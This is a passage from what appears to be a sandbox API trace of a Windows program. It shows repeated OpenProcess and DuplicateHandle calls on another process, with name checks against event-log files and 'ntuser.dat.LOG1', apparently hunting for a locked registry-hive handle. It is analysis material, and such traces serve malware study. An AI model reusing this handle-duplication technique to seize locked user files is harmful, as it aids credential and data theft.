(in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.000] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.001] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.001] CloseHandle (hObject=0x1e4) returned 1 [0161.001] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.001] CloseHandle (hObject=0x194) returned 1 [0161.001] CloseHandle (hObject=0x1e8) returned 1 [0161.001] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.001] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.002] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.003] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.003] CloseHandle (hObject=0x1e4) returned 1 [0161.003] CloseHandle (hObject=0x194) returned 1 [0161.003] CloseHandle (hObject=0x1e8) returned 1 [0161.003] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.003] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.004] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.005] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.005] CloseHandle (hObject=0x1e4) returned 1 [0161.005] _wcsicmp (_Str1="\\eventlog", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.005] CloseHandle (hObject=0x194) returned 1 [0161.005] CloseHandle (hObject=0x1e8) returned 1 [0161.005] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.005] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.005] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.006] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.007] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.007] CloseHandle (hObject=0x1e4) returned 1 [0161.007] _wcsicmp (_Str1="\\eventlog", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.007] CloseHandle (hObject=0x194) returned 1 [0161.007] CloseHandle (hObject=0x1e8) returned 1 [0161.007] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.007] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.008] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.009] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.009] CloseHandle (hObject=0x1e4) returned 1 [0161.009] _wcsicmp (_Str1="\\eventlog", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.009] CloseHandle (hObject=0x194) returned 1 [0161.009] CloseHandle (hObject=0x1e8) returned 1 [0161.009] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.009] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.010] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.010] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.011] CloseHandle (hObject=0x1e4) returned 1 [0161.011] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\ntuser.dat.LOG1") returned -2 [0161.011] CloseHandle (hObject=0x194) returned 1 [0161.011] CloseHandle (hObject=0x1e8) returned 1 [0161.011] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.011] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.011] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.011] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.012] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.012] CloseHandle (hObject=0x1e4) returned 1 [0161.012] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\ntuser.dat.LOG1") returned -2 [0161.012] CloseHandle (hObject=0x194) returned 1 [0161.012] CloseHandle (hObject=0x1e8) returned 1 [0161.012] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.012] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.013] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.014] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.014] CloseHandle (hObject=0x1e4) returned 1 [0161.014] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.014] CloseHandle (hObject=0x194) returned 1 [0161.014] CloseHandle (hObject=0x1e8) returned 1 [0161.014] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.014] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.014] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.015] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.015] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.016] CloseHandle (hObject=0x1e4) returned 1 [0161.016] CloseHandle (hObject=0x194) returned 1 [0161.016] CloseHandle (hObject=0x1e8) returned 1 [0161.016] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.016] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.016] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.017] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.017] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.017] CloseHandle (hObject=0x1e4) returned 1 [0161.018] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.018] CloseHandle (hObject=0x194) returned 1 [0161.018] CloseHandle (hObject=0x1e8) returned 1 [0161.018] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.018] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.018] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.019] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.019] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.019] CloseHandle (hObject=0x1e4) returned 1 [0161.020] CloseHandle (hObject=0x194) returned 1 [0161.020] CloseHandle (hObject=0x1e8) returned 1 [0161.020] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.020] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.020] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.021] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.021] CloseHandle (hObject=0x1e4) returned 1 [0161.021] CloseHandle (hObject=0x194) returned 1 [0161.021] CloseHandle (hObject=0x1e8) returned 1 [0161.021] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.021] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.022] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.023] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.023] CloseHandle (hObject=0x1e4) returned 1 [0161.023] CloseHandle (hObject=0x194) returned 1 [0161.023] CloseHandle (hObject=0x1e8) returned 1 [0161.023] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.023] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.024] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.025] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.025] CloseHandle (hObject=0x1e4) returned 1 [0161.025] _wcsicmp (_Str1="\\System.evtx", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.025] CloseHandle (hObject=0x194) returned 1 [0161.025] CloseHandle (hObject=0x1e8) returned 1 [0161.025] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.025] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.026] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.027] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.027] CloseHandle (hObject=0x1e4) returned 1 [0161.027] _wcsicmp (_Str1="\\Application.evtx", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.027] CloseHandle (hObject=0x194) returned 1 [0161.027] CloseHandle (hObject=0x1e8) returned 1 [0161.027] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.027] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.028] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.029] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.029] CloseHandle (hObject=0x1e4) returned 1 [0161.029] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.029] CloseHandle (hObject=0x194) returned 1 [0161.029] CloseHandle (hObject=0x1e8) returned 1 [0161.029] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.029] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.030] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.031] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.031] CloseHandle (hObject=0x1e4) returned 1 [0161.031] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.031] CloseHandle (hObject=0x194) returned 1 [0161.031] CloseHandle (hObject=0x1e8) returned 1 [0161.031] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.031] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.031] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.031] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.032] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.032] CloseHandle (hObject=0x1e4) returned 1 [0161.032] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.032] CloseHandle (hObject=0x194) returned 1 [0161.032] CloseHandle (hObject=0x1e8) returned 1 [0161.033] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.033] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.033] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.034] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.034] CloseHandle (hObject=0x1e4) returned 1 [0161.034] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\ntuser.dat.LOG1") returned 1 [0161.034] CloseHandle (hObject=0x194) returned 1 [0161.034] CloseHandle (hObject=0x1e8) returned 1 [0161.034] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.034] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.038] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.039] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.039] CloseHandle (hObject=0x1e4) returned 1 [0161.039] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.039] CloseHandle (hObject=0x194) returned 1 [0161.039] CloseHandle (hObject=0x1e8) returned 1 [0161.039] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.039] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.039] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.040] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.041] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.041] CloseHandle (hObject=0x1e4) returned 1 [0161.041] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.041] CloseHandle (hObject=0x194) returned 1 [0161.041] CloseHandle (hObject=0x1e8) returned 1 [0161.041] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.041] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.041] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.042] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.043] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.043] CloseHandle (hObject=0x1e4) returned 1 [0161.043] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\ntuser.dat.LOG1") returned -6 [0161.043] CloseHandle (hObject=0x194) returned 1 [0161.043] CloseHandle (hObject=0x1e8) returned 1 [0161.043] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.043] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.044] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.045] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.045] CloseHandle (hObject=0x1e4) returned 1 [0161.045] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.045] CloseHandle (hObject=0x194) returned 1 [0161.045] CloseHandle (hObject=0x1e8) returned 1 [0161.045] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.045] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.046] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.046] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.047] CloseHandle (hObject=0x1e4) returned 1 [0161.047] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.047] CloseHandle (hObject=0x194) returned 1 [0161.047] CloseHandle (hObject=0x1e8) returned 1 [0161.047] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.047] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.048] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.049] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.049] CloseHandle (hObject=0x1e4) returned 1 [0161.049] CloseHandle (hObject=0x194) returned 1 [0161.049] CloseHandle (hObject=0x1e8) returned 1 [0161.049] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.049] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.050] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.051] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.051] CloseHandle (hObject=0x1e4) returned 1 [0161.051] CloseHandle (hObject=0x194) returned 1 [0161.051] CloseHandle (hObject=0x1e8) returned 1 [0161.051] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.051] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.051] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.052] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.052] CloseHandle (hObject=0x1e4) returned 1 [0161.052] CloseHandle (hObject=0x194) returned 1 [0161.052] CloseHandle (hObject=0x1e8) returned 1 [0161.052] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.052] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 